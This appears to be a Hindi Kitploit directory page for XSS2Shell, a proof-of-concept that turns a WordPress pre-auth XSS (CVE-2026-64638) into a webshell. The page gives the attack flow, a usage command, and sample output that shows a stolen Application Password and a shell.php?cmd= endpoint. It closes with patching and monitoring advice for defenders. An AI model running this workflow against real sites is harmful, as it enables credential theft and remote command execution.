Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/wordsec/xss2shell
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubwordsec/xss2shell

XSS2Shell

# वर्डप्रेस प्री-ऑथ XSS से RCE शोषण PoC (xss2shell और CVE-2026-64638)

रिपॉजिटरी देखें
6111 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

XSS2Shell

XSS2Shell CVE-2026-64638 के लिए एक शैक्षिक प्रूफ-ऑफ-कॉन्सेप्ट है, जो कमजोर WordPress इंस्टॉलेशन में प्री-ऑथेंटिकेशन XSS समस्या के प्रभाव को प्रदर्शित करता है। व्यवस्थापक की स्पष्ट भागीदारी के साथ, PoC एक WordPress Application Password कैप्चर करता है, एक अस्थायी पेज प्रकाशित करता है, एक टेस्ट प्लगइन अपलोड करता है, और जाँचता है कि परिणामी शेल एंडपॉइंट एक कमांड निष्पादित कर सकता है या नहीं।

तकनीकी पृष्ठभूमि: WordPress Pre-Auth XSS to RCE: CVE-2026-64638

केवल शिक्षा और अधिकृत परीक्षण के लिए। इस टूल को केवल उन्हीं WordPress साइटों के विरुद्ध चलाएँ जिनके स्वामी आप हैं या जिनके आकलन की लिखित अनुमति आपके पास है। इसका उपयोग तीसरे पक्ष के व्यवस्थापकों या प्रोडक्शन सिस्टम को लक्षित करने के लिए न करें।

आवश्यकताएँ

  • Python 3.7 या नया
  • एक सुलभ WordPress परीक्षण इंस्टॉलेशन
  • एक व्यवस्थापक जो लक्ष्य में लॉग इन कर सके और हमलावर URL खोल सके
  • व्यवस्थापक के ब्राउज़र से लिसनर पते तक नेटवर्क पहुँच
  • कोई तृतीय-पक्ष Python पैकेज नहीं

उपयोग

root@kitploit:~
python3 xss2shell_poc.py -t http://wordpress.research.local --lhost 192.168.1.227 --lport 8080 -c "whoami"

विकल्प

विकल्पआवश्यकविवरण
-t, --targetहाँWordPress आधार URL, जिसमें http:// या https:// शामिल है
-c, --commandहाँशेल उपलब्ध होने के बाद चलाने के लिए कमांड
--lhostनहींबाइंड करने और विज्ञापित करने के लिए लिसनर IP; डिफ़ॉल्ट रूप से पता लगाया गया LAN IP
--lportनहींलिसनर पोर्ट; 0 एक यादृच्छिक उपलब्ध पोर्ट चुनता है
--keepनहींअस्थायी पेज को हटाने के बजाय प्रकाशित कलाकृतियों को रखें

लक्ष्य URL स्वचालित रूप से सामान्यीकृत होता है, इसलिए अंतिम स्लैश वैकल्पिक है।

ऑपरेटर प्रवाह

  1. टूल जाँचता है कि /wp-login.php सुलभ है और WordPress लॉगिन पेज जैसा दिखता है।
  2. यह एक स्थानीय HTTP लिसनर शुरू करता है और लिसनर URL प्रिंट करता है।
  3. अधिकृत व्यवस्थापक लक्ष्य में लॉग इन करता है और उस URL को खोलता है।
  4. ब्राउज़र प्रवाह एक Application Password का अनुरोध करता है और परिणाम लिसनर को भेजता है।
  5. PoC कैप्चर की गई साख का उपयोग करके एक अस्थायी हमलावर पेज प्रकाशित करता है।
  6. पेज व्यवस्थापक के सत्र के साथ टेस्ट प्लगइन अपलोड करता है।
  7. टूल shell.php को सत्यापित करता है और अनुरोधित कमांड चलाता है।

लिसनर व्यवस्थापक के ब्राउज़र के लिए सुलभ होना चाहिए। NAT, फ़ायरवॉल, प्रॉक्सी, पॉपअप-ब्लॉकिंग और मिश्रित-सामग्री नियम ब्राउज़र प्रवाह को पूरा होने से रोक सकते हैं।

उदाहरण आउटपुट

root@kitploit:~
 __          __           _  _____           
 \ \        / /          | |/ ____|          
  \ \  /\  / /__  _ __ __| | (___   ___  ___ 
   \ \/  \/ / _ \| '__/ _` |\___ \ / _ \/ __|
    \  /\  / (_) | | | (_| |____) |  __/ (__ 
     \/  \/ \___/|_|  \__,_|_____/ \___|\___|
                                              
                                              
xss2shell & CVE-2026-64638 |  https://wordsec.net/ - Education Purpose Only


============================================================
[*] XSS2Shell starting ...
[*] Checking target: http://wordpress.research.local/wp-login.php
[+] Admin panel found: http://wordpress.research.local/wp-login.php
[+] Attacker server listening: 192.168.1.227:8080
[*] On the target website, the admin must open this page and log in:
    ->  http://wordpress.research.local/wp-login.php
[*] Then the admin opens the link that was sent to them:
    ->  http://192.168.1.227:8080/
[*] Waiting for the admin to visit (Ctrl+C to stop) ...
[+] Child popup document initialized
[+] Popup window ready, XSS payload prepared
[+] Application Password saved to xss2shell_creds.json for later runs (shell: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php)
[+] XSS payload POSTed to wp-login.php
[+] Application Password stolen: user=admin pass=3SGS Loba 2Txw EzWz EbZC xZst (saved to xss2shell_creds.json)
[+] Attacker page published: http://wordpress.research.local/xss2shell-1786125273210/
[+] Plugin ZIP upload request sent with the victim's session
[+] Shell reachable: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php

============================================================
[+] Command output:
www-data
============================================================
[*] Cleanup: published page deleted (id=61)
[*] Cleanup: Application Password, plugin shell, and saved credentials preserved

[+] Shell link: http://wordpress.research.local/wp-content/plugins/xss2shell/shell.php?cmd=whoami
[+] Done.

कलाकृतियाँ और सफ़ाई

सफल रन कैप्चर किए गए Application Password को बाद के रनों में पुन: उपयोग के लिए xss2shell_creds.json में सहेजते हैं। अस्थायी प्रकाशित पेज कमांड के बाद स्वचालित रूप से हटा दिया जाता है जब तक कि --keep का उपयोग न किया जाए।

टेस्ट प्लगइन, शेल एंडपॉइंट, Application Password और सहेजी गई साख वर्तमान PoC द्वारा जानबूझकर संरक्षित की जाती हैं। अधिकृत आकलन के बाद उन्हें परीक्षण साइट से मैन्युअल रूप से हटाएँ, और स्थानीय रूप से xss2shell_creds.json को हटा दें।

साख फ़ाइल को संवेदनशील मानें और इसे कभी भी संस्करण नियंत्रण में कमिट न करें।

सुरक्षा दिशानिर्देश

  • WordPress को ऐसे संस्करण में पैच करें जो CVE-2026-64638 से प्रभावित न हो।
  • मजबूत व्यवस्थापक प्रमाणीकरण लागू करें और 2FA सक्षम करें।
  • प्लगइन इंस्टॉलेशन और एप्लिकेशन-पासवर्ड निर्माण को विश्वसनीय भूमिकाओं तक सीमित करें।
  • परीक्षण के बाद व्यवस्थापक Application Passwords, प्रकाशित पेजों और हाल ही में स्थापित प्लगइन्स की समीक्षा करें।
  • प्लगइन अपलोड और REST एंडपॉइंट्स के अप्रत्याशित अनुरोधों की निगरानी करें और उन्हें ब्लॉक करें।

लाइसेंस

इस रिपॉजिटरी में शामिल लाइसेंस का उपयोग करें।

WordSec द्वारा निर्मित

टूल डाउनलोड करें